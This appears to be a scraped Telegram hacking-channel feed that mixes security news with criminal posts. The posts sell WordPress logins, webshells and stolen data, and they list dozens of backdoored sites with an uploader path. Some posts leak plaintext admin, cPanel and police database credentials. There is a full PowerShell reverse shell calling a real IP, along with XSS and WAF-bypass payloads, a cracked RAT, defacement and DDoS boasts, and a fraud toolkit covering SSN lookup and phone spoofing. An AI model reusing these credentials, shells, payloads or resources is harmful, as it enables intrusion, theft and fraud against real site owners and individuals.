☢️ FOR SALE🚨 X1000 Wordpress Login 💎☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:100$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆➖➖➖➖➖➖➖➖➖➖ Images
2023-03-29 13:41:47
🔥 Free Access (Uploader) 💎http://ketitangkidul-bojong.desakupekalongan.id/wp-content/themes/seotheme/db.php?uhttp://pennypickgains.com/wp-content/themes/seotheme/db.php?uhttp://www.intendedparentsforum.com/wp-content/themes/seotheme/db.php?uhttp://abawaterloo.ca/wp-content/themes/seotheme/db.php?uhttp://gothrivenc.com/wp-content/themes/seotheme/db.php?uhttp://shopgamei.com/wp-content/themes/seotheme/db.php?uhttp://mistorenow.com/wp-content/themes/seotheme/db.php?uhttp://www.donmario.com.br/wp-content/themes/seotheme/db.php?uhttp://apptafe.com/wp-content/themes/seotheme/db.php?uhttp://onlinecoursecoach.com/wp-content/themes/seotheme/db.php?uhttp://lostronaut.com/wp-content/themes/seotheme/db.php?uhttp://sofuapk.com/wp-content/themes/seotheme/db.php?uhttp://gshopapk.com/wp-content/themes/seotheme/db.php?uhttp://www.copastur.com.br/wp-content/themes/seotheme/db.php?uhttp://storefek.com/wp-content/themes/seotheme/db.php?uhttp://depotgamer.com/wp-content/themes/seotheme/db.php?uhttp://martoo.com/wp-content/themes/seotheme/db.php?uhttp://byzfunder.com/wp-content/themes/seotheme/db.php?uhttp://thegoodflight.com.au/wp-content/themes/seotheme/db.php?uhttp://www.cr3.go.th/wp-content/themes/seotheme/db.php?uhttp://jadilaris.com/wp-content/themes/seotheme/db.php?uhttp://greengoddesscollective.com/wp-content/themes/seotheme/db.php?uhttp://yourcarrypermit.com/wp-content/themes/seotheme/db.php?uhttp://jmwlegal.com.au/wp-content/themes/seotheme/db.php?uhttp://ligiahouben.com/wp-content/themes/seotheme/db.php?uhttp://tealsprairie.co.uk/wp-content/themes/seotheme/db.php?uhttp://wholesale.martoo.com/wp-content/themes/seotheme/db.php?uhttp://www.theandroidtutorials.com/wp-content/themes/seotheme/db.php?uhttp://megapkstore.com/wp-content/themes/seotheme/db.php?uhttp://gememax.com/wp-content/themes/seotheme/db.php?uhttp://fb.mikerashid.com/wp-content/themes/seotheme/db.php?uhttp://juancamilogil.com/wp-content/themes/seotheme/db.php?uhttp://www.lupakic.com/wp-content/themes/seotheme/db.php?uhttp://www.cleanfeed-records.com/wp-content/themes/seotheme/db.php?uhttp://www.mtmassessoriacontabil.com.br/wp-content/themes/seotheme/db.php?uhttp://theonlinecoursecoach.com/wp-content/themes/seotheme/db.php?uhttp://www.dentistincedarpark.com/wp-content/themes/seotheme/db.php?uhttp://elitetestosteronereplacement.com/wp-content/themes/seotheme/db.php?uhttp://mykindpen.com/wp-content/themes/seotheme/db.php?uhttp://roguewaterlab.org/wp-content/themes/seotheme/db.php?u🧑‍💻 @LegionLeaker
2023-03-29 11:24:29
🚨 FOR SALE☢️➖➖➖➖➖➖➖➖➖➖🪙Domain: go.id & .id⭐️ https://pa-martapura.go.id/ ▶️https://smamuhrandublatung.sch.id/ ▶️https://realta.co.id/ ⭐️ https://www.pa-pelaihari.go.id/ ☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:60$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆
2023-03-29 03:21:29
None Images
2023-03-29 02:26:50
🚨 Viewers Discretion is Adviced 🇵🇰Reportedly 1 woman lost life and many injured in the rush to buy flour in Sahiwal Park, while the condition of three to four women is said to be critical : Local media Location: Sahiwal - Pakistan
2023-03-28 10:09:45
https://www.lifewire.com/free-cloud-storage-1356638
2023-03-28 09:40:21
A truck carrying ‘atta’ / flour is looted in Peshawar, Pakistan.But according to alleged factchecker Mohd. Zubair - India ranks 126th on the World Happines Index, while Pakistan is at 108 in the same rankings.t.me/MeghUpdates
2023-03-28 08:44:28
https://www.websec.ca/kb/sql_injection
2023-03-28 07:29:47
databse creddentions of Bangladesh police https://kmp.police.gov.bd/DB_CONNECTION=mysqlDB_HOST=127.0.0.1DB_PORT=3306DB_DATABASE=kmp_kmpDB_USERNAME=kmp_kmpDB_PASSWORD='I{0e$b{05CA{'
2023-03-28 06:52:54
smmhacks.com 😈Social Media Marketing Hacks at one place😁https://smmhacks.com/Ir.htmlhttps://zone-hc.org/archive/mirror/176https://zone-h.org/mirror/id/40546123@Hajit00n Images
2023-03-28 06:34:04
Security Fucker🎨Hacking Site Hacked 😐grow th hacking bites 😈https://growthhackingbites.com/Ir.htmlhttps://zone-hc.org/archive/mirror/175https://zone-h.org/mirror/id/40546118@Hajit00n Images
2023-03-28 02:45:41
pakcricknews 😂https://pakcricknews.com/Ir.htmlhttps://zone-hc.org/archive/mirror/165 Images
2023-03-28 02:30:29
Pakistan Documents LeakedThe information isn't really useful for novice users but could be usefulFor some registration purposedownload:https://mega.nz/file/Y2g3kaxT#NIJbZz2rzuthKjptXRIgfKR8oNxspAYcM-ZiuDRZxLYpass:@Hajit00n Images
2023-03-28 02:21:05
📣-Welcome To Our Group VIP-💎➖➖➖➖➖➖➖➖➖➖💰-Price -25$ - ➖➖➖➖➖➖➖➖➖➖➡️ Shells Method & Paid Exploits➡️ Exploits - Leaked & Paid➡️ Stealers Logs - Fresh ➡️ ComboList - Leads - Mail Access ➡️ New Scampages 2022 - Priv8 ➡️ Tools useful for your work ➡️ Laravel - WordPress Exploits ➡️ cPanels - Mailers - Smtps➡️ Method Making Wordpress & Laravel Sites ➖➖➖➖➖➖➖➖➖➖ 🔛 Payment BTC ⚡️ JOIN NOW - @Hajit00n 🎨➖➖➖➖➖➖➖➖➖➖
2023-03-28 02:19:06
✅FOR SALE✅🛒Hacking Tools🛒Banking Logs🛒 Webshells🛒Laravel list🛒Wordpress list🛒 Email's List✅FOR SALE✅🛒 For Buy: @Hajit00n
2023-03-28 02:15:01
✅ sell Hight DA ⚡️https://pa-pasuruan.go.id/https://mi.pa-pasuruan.go.id/http://sipanjoel.pa-pasuruan.go.id/💰 Price: 50$🛒 For Buy: @Hajit00n
2023-03-28 02:10:10
PK Admin 😈https://www.kate.pk/admin admin:Karachi@2018https://eph.com.pk/wp-login.php Admin:eph123*https://ecoset.pk/wp-login.php admin:@EcoSet@11@https://myza.pk/wp-login.php admin:koppy123@7872http://realstone.pk/wp-login.php admin:stone@real786https://tanabana.pk/wp-login.php Tana786:@Tahzeeb@pret11http://astrogem.pk/wp-login.php admin:cPF*xi!(3ILt&CdzrzJhttps://theservices.pk/wp-login.php Sayyam:Yag9WavA9bK#sovPhttps://natsolarenergy.com.pk/wp-login.php admin:natsolar@adminhttps://myza.pk/wp-login.php sheikhf301@gmail.com:koppy123@7872https://ubill.pk/wp-login.php jamiataleempk@gmail.com:Asad@12581010https://partyspot.pk/wp-login.php admin-adeel:mTqU2)Gwg9k0NjveO8%CeWm)https://ibpcorporateservices.com.pk/wp-login.php admin:$P$BfOAXfmzVYq1lohttps://ukelectronics.com.pk/wp-login.php ukelectronics@hotmail.com:@Wateen4939https://rechargedishtv.com.pk/wp-login.php rechargmayor567:Pc(4!4BHLeWeZ%FJGwI2Ji$W@Hajit00n
2023-03-28 00:50:32
PK cpanel 😈http://cpanel.sarco.com.pk wwwsarcocom:QpBx*hwiJU}# | Domains: 1 | sarco.com.pkhttps://freshtogo.pk:2083 freshtogo:cx80GgCs23 | Domains: 2 | app.freshtogo.pk | freshtogo.pkhttps://bom1plzcpnl493916.prod.bom1.secureserver.net:2096/logout RK@tmlproperties.pk:Bahria@123 | Domains: 0 | https://cp3.mywebsitebox.com:2083 natsolar:Q6g*6a67PsGn#Y | Domains: 2 | natsolarenergy.com.pk | verify.natsolarenergy.com.pk@LegionLeaker
2023-03-28 00:46:40
.edu.pk 🤘😈卩ro 爪Cracker 😂❤️https://icomet.iba-suk.edu.pk/
2023-03-28 00:26:21
💥How we broke PHP, hacked Pornhub and earned $20,000tl;dr:💾We have gained RCE on pornhub.com and have earned a $20,000 bug bounty on Hackerone.💾We have found two UAF vulns in PHP’s GC algorithm.💾Those vulnerabilities were remotely exploitable over PHP’s unserialize function.💾We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone). Images Images Images
2023-03-27 13:59:08
https://t.me/+iZw6ZPyLbFRlMzJlIndian collection all rounder databaseShare now
2023-03-27 07:59:01
https://t.me/cyberdemonsDDNewbies can join this channel
2023-03-26 13:57:51
ADVANCE FOOTPRINTING SESSION FOR BEGINNERS ✌️BY - @x_cyanide_x TIME - 26 march(TODAY) at 7 :30 PMOUR WEBSITE - system32.inkONLY ON THIS DISCUSSION GROUP👇👇👇@cyberdemonsD#happyhacking
2023-03-26 12:01:19
https://www.linkedin.com/posts/santosh-nandakumar_learn-encryption-with-mahabharata-ugcPost-7045480927866589184-xUKp?utm_source=share&utm_medium=member_android
2023-03-26 04:15:42
Mission Successful 🇮🇳🇮🇳🇮🇳
2023-03-25 19:18:23
🎈 happy Birthday Sir @MCracker2002 🎈आप आशावाद और कड़ी मेहनत के अवतार हैं।💕 हमें हर दिन प्रेरित करने के लिए धन्यवाद। 💕जन्मदिन 🎂 की शुभकामना गुरुजी @MCracker2002
2023-03-25 17:41:41
Hello guys I made a crypto hacking class how to 1.hack how to generate seed 2.brute forces of crypto seed 3.blockchain transaction finder 4.seed grabber 5.tron private key finder 12 phrases + 1 6.NFT seed grabber 7.Trust wallet Seed grabber 8.ledger and cold wallet Grabber8.brain flayer cracking 9.crypto phishing 10. Development of cold and hot wallet 11.cracking wallet.dat files @alex14324
2023-03-25 09:07:24
🍭 Free useful resources to learn Machine Learning 🍭👉 Googlehttps://developers.google.com/machine-learning/crash-course👉 Leetcodehttps://leetcode.com/explore/featured/card/machine-learning-101👉 Hackerrankhttps://www.hackerrank.com/domains/ai/machine-learning👉 FreeCodeCamphttps://www.freecodecamp.org/learn/machine-learning-with-python/👉 Kagglehttps://www.kaggle.com/learn/intro-to-machine-learninghttps://www.kaggle.com/learn/intermediate-machine-learning👉 Geeksforgeekshttps://www.geeksforgeeks.org/machine-learning/👉 Create ML Modelshttps://docs.microsoft.com/en-us/learn/paths/create-machine-learn-models/👉 Machine Learning Test Cheat Sheethttps://www.cheatography.com/lulu-0012/cheat-sheets/test-ml/pdf/━ POSTED BY @iishantt ━ 
2023-03-24 20:46:20
None
2023-03-24 14:42:37
HOW TO SURF ANONYMOUSLY? ALL ABOUT PROXIES 😈FOR BEGINNERS BY - @localhost12hack TIME - STARTING IN 2 MINUTESOUR WEBSITE - system32.inkONLY ON THIS DISCUSSION GROUP👇👇👇@cyberdemonsD
2023-03-24 12:51:10
Remote unauthenticated system and cloud takeover found in major AI toolhttps://ift.tt/fBVneksSubmitted March 24, 2023 at 05:24PM by FlyingTrianglevia reddit https://ift.tt/CEyvZq1
2023-03-24 12:31:31
https://www.instagram.com/p/CqK_Fkwr7t7/?utm_source=ig_web_copy_link
2023-03-24 09:36:15
|Pwn2Own Vancouver 2023 - Day One Results|💥 STAR Labs was able to execute a 2-bug chain against Microsoft SharePoint. They earn $100,000 and 10 Master of Pwn points💥 Bien Pham from Qrious Security used an OOB Read and a stacked-based buffer overflow to exploit Oracle VirtualBox. He earns $40,000 and 4 Master of Pwn points.💥 Synacktiv was able to execute their TOCTOU attack against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and a Tesla Model 3.💥STAR Labs successfully executed their attack against Ubuntu Desktop, but the exploit was previously known. They still earn $15,000 and 1.5 Master of Pwn points.💥 Marcin Wiązowski used an improper input validation bug to elevate privileges on Windows 11. He earns $30,000 and 3 Master of Pwn points.💥 Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points.
2023-03-23 11:23:04
ALL ABOUT DARKWEB WITH PRACTICAL FOR BEGINNERS BY - @localhost12hack TIME - 7:30 PM ( TODAY )OUR WEBSITE - system32.inkONLY ON THIS DISCUSSION GROUP👇👇👇@cyberdemonsDSORRY YESTERDAY I WAS 😷 SO TODAY WE WILL DEFINITELY HOST THE SESSION
2023-03-23 09:48:21
CRAXS RAT V4 CRACKED- FIXED BUILD- NEW FUNCTIONSUse It In VM Or RDP
2023-03-22 15:49:54
Join our group for Cyber security contentt.me/ethicalhackingtechofide
2023-03-22 15:30:07
#USEFUL SITES TO USE ON (Some Links Not Up To Date)BROWSER FINGERPRINT TESThttps://panopticick.eff.orghttps://whatleaks.com/DRIVER LICENSE GENERATORhttps://www.elfqrin.comhttp://www.highprogrammer.com/cgi-bin/uniqueid/dlDROP/RESHIPhttp://reship.comhttps://www.myus.comhttps://www.shipito.comhttps://www.usunlocked.com/https://virtualpostmail.comDNS LEAK TESTdnsleaktest.comhttps://www.simplednscrypt.org/VIRTUAL OFFICEhttps://www.opusvirtualoffices.com/https://www.regus.com/https:cloudvo.com/https://www.davincivirtual.com/fit-small-businesshttp://www.alliedoffices.com/AREA PHONE CODEShttps://www.allareacodes.comSMS VERIFICATIONSmspool.nethttps://app.truverifi.com/loginhttp://www.receive-sms-now.comhttps://azersms.com/http://www.textnow.comhttps://www.blacktel.io/SPOOF PHONEhttps://www.spooftel.comhttps://tracebust.com/https://www.spoofcard.comhttps:/ /securecall.club/loginUSER AGENT CHECKERhttp://whatsmyuseragent.comFAX SENDERhttps://portalpamfax.biz/PortalLogin/lnit/FREE UDEMY COURSEShttps://www.zapcourses.comhttps://www.freshersgold.comCUSTOM/FAKE RECEIPT MAKERhttp://www.fakereceipt.us/sales_receipt.phphttp://www.customreceipt.com/SSN VALIDATORhttp://www.ssnvalidator.comSSN DECODERhttp://www.stevemorse.org/ssn/ssn.htmlSOCKS CHECKERhttps://fraud.cat/https://xdedicvhnguh5s6k.onion/https://www.ipqualityscore.com/https://getipintel.net/index.php#webEIN SEARCHhttp://www.feinsearch.comhttps://www.einfinder.comhtp://freerisa.benefitspro.com/http://dor.wa.gov/content/doingbusiness/registermybusiness/BRD/default.aspxhttp://search.sunbiz.org/Inquiry/CorporationSearch/ByFeiNumberRESIDENTIAL RDP ACCEPTING BITCOINhttps://www.resnetworking.com/https://exavpn.com/https:/ıxdedicvhnguh5s6k.onion/SSN/DOB SEARCHhttps://ssndob.cchttps://robocheck.cmMMN AUTOSEARCHarchives.comancestry.comBACKGROUND CHECKhttp://www.intelius.comhttp://checkmate.comhttp://equifax.comhttp://thatsthem.comhttps://www.mylife.comhttps://t.me/tutorials_zonehttps://www.peoplesmart.comhttp://familytreenow.comhttps://ogin.dicore.com/https://www.tlo.com/https://batchskiptracing.com/pricing/CREDIT REPORThttps://www.quizzle.comhttps://my.bankrate.comfreecreditreport.com creditkarma.com/free-credit-report➖➖➖➖➖➖➖➖➖➖
2023-03-22 12:21:51
💥"Actual" image recovery:1️⃣Take a JPEG image2️⃣Make a copy of it3️⃣Crop it in Snipping Tool4️⃣Save/overwrite4️⃣In a hex editor, overwrite the EOI Marker (0xFFD9)5️⃣Repair it at http://jpg.repair6️⃣Wonder how secure your cropped image data is Images
2023-03-22 03:17:24
Mitigating SSRF in 2023https://ift.tt/EhW6jncSubmitted March 21, 2023 at 08:03PM by l_tennantvia reddit https://ift.tt/2W1fGbM
2023-03-21 00:48:07
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//14.rs> i.e. instead of the standard XSS payload to execute js Images
2023-03-21 00:44:38
None
2023-03-20 21:34:00
Join our group for more such Cyber security contentt.me/ethicalhackingtechofide
2023-03-20 18:23:09
A video on Digital ForensicsVolatilityA video on Digital Forensicshttps://youtu.be/wsaWF8lEnPw
2023-03-20 13:22:49
💥Shannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (NrSmMsgCodec as it’s called in Shannon according to debug strings), when decoding the “Extended protocol configuration options” message (IEI = 0x7B).The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to 255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.🔖An “Extended protocol configuration options” message that triggers the overflow is provided in epco-reserved-poc.dat.
2023-03-19 08:10:13
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.Stupid backdoor!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
2023-03-18 14:01:17
CYBER SECURITY ROADMAP TIME - LIVE COME LETS DISCUSS ABOUT FUTURE IN CYBER SECURITY OUR WEBSITE - system32.ink BY PROFESSIONALS ONLY ON THIS DISCUSSION GROUPhttps://t.me/cyberdemonsD
2023-03-18 11:57:53
Federal agents of U.S. law enforcement arrested on Wednesday have arrested Conor Brian Fitzpatrick, a Peekskill, New York resident, who allegedly operated the infamous dark web data breach site, "BreachForums." The site, which hosted stolen databases from nearly 1,000 companies and websites, has been a significant player in the cybercrime ecosystem.Fitzpatrick, who went by the online alias "Pompompurin," was charged with a single count of conspiracy to commit access device fraud. BreachForums offered stolen personal information, including names, emails, and passwords, for sale to users. These databases were often used for fraudulent activities. Fitzpatrick's arrest took place at his home, where he admitted to using the alias "Pompompurin" and operating BreachForums.In an affidavit filed with the District Court for the Southern District of New York, FBI Special Agent John Langmire said that at around 4:30 p.m. on March 15, 2023, he led a team of law enforcement agents that made a probable cause arrest of a Conor Brian Fitzpatrick in Peekskill, NY.#stay safe while hacking "ethically"#Focus on your OPSEC Images
2023-03-18 11:24:41
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
2023-03-18 04:29:32
CYBER SECURITY ROADMAP TIME - 18 MARCH( TODAY ) AT 7:30 PM OUR WEBSITE - system32.ink BY PROFESSIONALS ONLY ON THIS DISCUSSION GROUPhttps://t.me/cyberdemonsD
2023-03-17 13:53:18
SQL INJECTION CLASS FOR BEGNEERSLEARN SQL FROM BASICS TIME - STARTING IN 5 MINUTES ( 7:30)OUR WEBSITE - system32.ink BY CERTIFIED ETHICAL HACKER - @x_cyanide_x ONLY ON THIS DISCUSSION GROUPhttps://t.me/cyberdemonsD
2023-03-17 10:47:05
🔥Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems Until security updates are available, users who wish to protect themselves from the baseband remote code execution vulnerabilities in Samsung’s Exynos chipsets can turn off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings.Turning off these settings will remove the exploitation risk of these vulnerabilities.Chipsets to devices, affected products likely include:💾Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series;💾Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;💾The Pixel 6 and Pixel 7 series of devices from Google;💾any wearables that use the Exynos W920 chipset; and💾any vehicles that use the Exynos Auto T5123 chipset. Images
2023-03-17 01:27:43
In India the best way to come in limelight or Increase Buisness is to abuse the sentiments against the nation itself, People will start talking about you or could be in your perimeter.Same happening in cybersecurity industry where online telegram users of so called company just see the posts of small kids attacking websites of India which dont have any severe vulnerability of Any APT level/type attack but portraits as huge attack or they are the best company. How ? With telegramic employees ?? Seriously !!! Employees Who see the posts of script kiddies on telegram and makes out the reasearch report. No it will be wrong if i also said research report actually that is paid media reports which is published to make the company big.Earlier also that company with zero knowledge of employees published the report about malaysian hackers who were just a script Kiddies.In fact, There are many State Sponsered APT level workers who continuously work for the nation in every country, You never know. The real attacks should be researched out not any attacks which is publically available.The old generation was disgusting in field of understanding the cybersecurity but these kind of people make this today's generation fool too.
2023-03-16 21:43:55
You can join our group for more such Cyber security contentt.me/ethicalhackingtechofide
2023-03-16 21:42:20
https://youtu.be/83DEdhCQCR8
2023-03-16 15:46:13
How Scammers Scam you To Show You How they hack Android using PDF They Use Old Adobe App (A RCE VULN. In IT) to Exploit Android full Blog: https://hulkvision.github.io/blog/post1/
2023-03-16 15:34:51
SQL INJECTION CLASS FOR BEGNEERSLEARN SQL FROM BASICS TIME - 17 MARCH( TOMMOROW ) AT 7:30 PM OUR WEBSITE - system32.ink BY CERTIFIED ETHICAL HACKER - @x_cyanide_x ONLY ON THIS DISCUSSION GROUPhttps://t.me/cyberdemonsD
2023-03-16 13:16:17
https://cyberhell.forumotion.com/t5-fake-eth-miner-scam-exposed#6
2023-03-16 13:16:16
ETH 💸 MINER/FINDER SCAM exposedBy @Devil_Anon 💻☢️Watch the video▶️ to see the illustration on how it's done, and get the code from our forum post below.Spread awareness🎙📞 and let more people be aware of this trick which many people are being ripped off upon.Share🌐 and support⭐️@cyberhellcommunity
2023-03-16 08:37:29
CVE-2023-23397_EXPLOIT_0DAYDownload: https://system32.ink/news-feed/p/268/
2023-03-16 05:59:34
gg's hacker's ( have a good day —❤️ ‼️Here we go again Use AI to generate the perfect professional excuse 😂😂#hacker_bano_chutiya_nhe 👀👀
2023-03-15 12:13:48
Employers_Federation_of_Pakistan.zip
2023-03-15 07:10:02
Vulnerabilities in the TPM 2.0 reference implementation codeBlog+TMP_vuln_POC = https://system32.ink/news-feed/p/267/
2023-03-14 14:57:00
🔥Experimental navigation object contains a new DOM XSS source! navigation.currentEntry.urlnavigation.entries()[0].url Images
2023-03-13 14:29:47
Join our group for Exclusive Cyber security, pen testing, bug hunting and ethical hacking content.Inviting you all to come and join our communityt.me/ethicalhackingtechofide
2023-03-13 02:39:39
https://t.me/LEGIONLEAKER
2023-03-12 20:36:51
https://youtu.be/JfpBi8MUllkJoin our group for more such Cyber security content t.me/ethicalhackingtechofide
2023-03-12 11:21:45
Nmap:- Firewall evasion/Bypass, MTU and fragmentation.By @Devil_Anon 😈What is firewall evasion ❔This technique refers to generating or manually specifying the IP Addresses of the decoys to evade IDS / Firewalls. It appears to the target as well as the host are scanning the network. This technique makes it really difficult for the IDS / Firewalls to determine which IP Address is actually scanning the network and which IP addresses are a decoy.Show reactions 💯❤️ and enjoy the video.Share and promote@cyberhellcommunityComment section :- HERE
2023-03-12 08:34:17
Hello Pakistan 👋Aapne ghabrana nahi hai.
2023-03-11 18:36:54
https://youtu.be/oiIGkd_01BAJoin our group for more such Cyber security content t.me/ethicalhackingtechofide
2023-03-11 08:43:05
⚡⚡WATCH AND SPREAD!!🇮🇳🇮🇳🔺@AngrySaffron
2023-03-11 06:48:16
None
2023-03-11 06:16:55
Summary: In span of 2years NITB hosted 50-70+ internal portals for pakistan government. I think there is no need to write more.
2023-03-10 01:59:09
💥The Untold Story of the BlackLotus UEFI Bootkit🔖Semantic-based rule to cover malicious bootloader components from the BlackLotus bootkit(for FwHunt Community Scanner)
2023-03-08 07:56:28
https://www.youtube.com/watch?v=CtilKPLz9lk
2023-03-08 07:36:34
कुछ सपने है इस बेदर्द जिन्दगी में,जिन्हें पाने कि चाह में हम खोए हैं।जिस समय ये दुनियां वाले आराम से सोए रहते है,उस समय हम अपने काम में शिद्दत से खोए रहते है.... Written by:- @lexlegion "Specially for Hacker's"
2023-03-08 07:25:20
Wishing you a very colorful and joyous Holi! On the happy occasion of Holi, may your life always be filled with the colors of joy and happiness.#Jai_Radhe_Krishna#DDoS_Evil_Family
2023-03-07 10:19:09
💥You can use the experimental 'navigation' object to trigger JS execution in Chrome.<script>navigation.navigate('javascript:alert(1)')</script> Images
2023-03-06 15:04:51
http://ple.com.pk/http://yamfoodspk.rinternational.pk/http://vapeexpertpk.rinternational.pk/http://thevapecenter.rinternational.pk/https://thecornerstore.rinternational.pk/https://superstoreonline.rinternational.pk/https://superdollarstore.rinternational.pk/https://onestopshop.rinternational.pk/http://nidasattire.rinternational.pk/http://ivmarketingisb.com.rinternational.pk/http://islamabaddrivingcenter.rinternational.pk/https://fusionmart.rinternational.pk/https://jootachappalstore.rinternational.pkhttps://dollarsavingsstore.rinternational.pkhttps://discounta.rinternational.pk/https://mail.rinternational.pk/index.htmlhttps://portal.islamabaddrivingcenter.comhttps://superstoreonline.rinternational.pk/https://nidasattire.comhttp://www.sante.com.pk/Fuck Pakistan#OPPK
2023-03-06 02:09:58
🤔CVE-2023-21716 (Microsoft Word RCE vuln) Python PoChttps://system32.ink/news-feed/p/266/
2023-03-06 01:15:11
None
2023-03-05 10:59:47
Check Out These SitesRedefaced By Indian Hackers 😘Power Of Indian Hackers &Feel The Power Of Indians🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮
2023-03-05 10:59:37
Hacked By EagleCyberhttps://amyhairaffair.co.in/https://aromatheluxuriousspa.com/https://blackbirdtattooart.com/https://d9spa.com/https://dishaexpresspackersmovers.in/https://divineclinic.co.in/https://drnrutikpatel.com/https://familythaispa.in/https://feminapg.com/https://www.globaltripadviser.com/https://gururavindraji.com/https://harsiddhipg.co.in/https://houseofteeth.in/https://importfolio.in/https://innerpeacespa.in/https://kdjewelers.com/https://maaskinclinic.co.in/https://maharajathaispa.com/https://margospineclinic.com/https://merakithaispa.co.in/https://poojadentalclinic.co.in/https://rajpg.co.in/https://samveddentalclinic.co.in/https://saranshphysio.com/https://spgtpvtltd.com/https://sucesstechno.com/https://sunfurniture.co.in/https://theetherealspa.com/https://thefehammamspa.in/https://theozonespa.in/http://theplatinumspa.co.in/https://vedikagynechospital.com/https://vsdesigno.com/https://zodiacayurvedikspa.com/#stand4muslim #TeamArmyBawangMalaysia #StucxnetCrewMalaysia #Khalifahcybercrew #EagleCyber #GhostClanOffical #KingsmenWorld #GhostArmy16 #AnonManK #DarkHCyberXArmy #DarkCyberXPravasiArmy #DarkHCyberXArmy #NinjaCrewCyberGhost #UndergroundGhostCrew #pejuangcyber #LcmySecTeam #K𝐚𝐦𝐩𝐮𝐧𝐠G𝐡𝐨𝐬𝐭𝐀𝐜𝐚𝐝𝐞𝐦𝐲𝐃𝐃𝐨𝐬𝐂𝐫3𝐰 #KampungGhostDDosCyberArmy's#KomunitiSiberMalaysia
2023-03-05 04:15:37
https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/
2023-03-05 02:39:05
💥Nuclei-templates that help during the bug bounty hunting process.https://system32.ink/news-feed/p/265/
2023-03-05 02:28:27
Cortex XDR Config Extractor is a tool is meant to be used during Red Team Assessments and to audit the XDR Settings. With this tool its possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.Supported Extractions:Uninstall Password Hash & SaltExcluded Signer NamesDLL Security Exclusions & SettingsPE Security Exclusions & SettingsOffice Files Security Exclusions & SettingsCredential Gathering Module ExclusionsWebshell Protection Module ExclusionsChildprocess Executionchain ExclusionsBehavorial Threat Module ExclusionsLocal Malware Scan Module ExclusionsMemory Protection Module StatusGlobal Hash ExclusionsRansomware Protection Module Modus & SettingsDownload:- https://system32.ink/news-feed/p/264/
2023-03-04 10:59:02
The Land of missing peopleThat is what Balochistan is called by nowadays Following the request of these people, we announce #OpBalochistanTo the pakistan army and ISI, You lot really wouldn't last a minute with our penetration. But we do wish you enjoy XoXo ~GhostSec
2023-03-03 15:52:37
WEBSITE HACKING Tutorial✅🌐 (WORDPRESS){Web Analysis, info Enumeration, CVE Analysis and Admin Panel Bruteforce.}By @Devil_Anon Tool :- wpscan O.S :- kali What is website hacking ❔website hacking is simply the unauthorized and attack infiltration unto the vulnerability of a website in order to get access to the admin panel.Give reactions❤️ and enjoy the video✅Comment Section HERE
2023-03-03 14:53:28
⚙️ CamOver is a camera exploitation tool that allows to disclosure network camera admin password.Features:💾Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.💾Optimized to exploit multiple cameras at one time from list with threading enabled.💾Simple CLI and API usage.⚙️ CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.Features:💾Exploits vulnerabilities in most popular camera models such as Novo, CeNova and QSee.💾Optimized to exploit multiple cameras at one time from list with threading enabled.💾Simple CLI and API usage. Images
2023-03-03 11:40:57
https://check-host.net/check-report/ede20fckfe7https://check-host.net/check-report/ede203bke2bhttps://priyoshop.com/https://www.othoba.com/Bangladesh Shopping Site Down By DdoS_Evil 😈😘
2023-03-03 07:35:01
https://github.com/onlurking/awesome-infosec
2023-03-02 14:46:36
Hacked By ICPhttps://armydogcenterpakistan.pk/😆Pakistan=Fuckistan#INDIAN_CYBER_FORCE #INDIAN_CYBER_PUNKS
2023-03-02 01:10:45
https://check-host.net/check-report/ed8bb70kf5fhttps://check-host.net/check-report/ed8bcf3k8d6https://islamabadtrafficpolice.gov.pk/ This Site Is Permanently Gone 😂😙https://joinpakarmy.gov.pk/2 sites went offline.. expect more attacks from PH and IND #fakpakpakpak #fckistan
2023-03-01 11:34:16
https://system32.ink/system32-byte-6/
2023-03-01 07:42:46
Best Web Crawling :https://www.cyotek.com/cyotek-webcopyhttp://www.octoparse.com/https://www.httrack.com/https://chrome.google.com/webstore/detail/scraper/mbigbapnjcgaffohmbkdlecaccepngjdhttps://addons.mozilla.org/en-US/firefox/addon/outwit-hub/http://visualscraper.blogspot.hk/https://www.parsehub.com/https://scrapinghub.com/https://webhose.io/https://dexi.io/https://www.import.io/https://www.spinn3r.com/
2023-03-01 05:02:17
